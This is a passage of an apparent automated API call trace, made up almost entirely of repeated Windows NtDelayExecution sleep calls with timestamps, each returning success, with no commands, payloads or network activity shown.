(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.821] NtDelayExecution 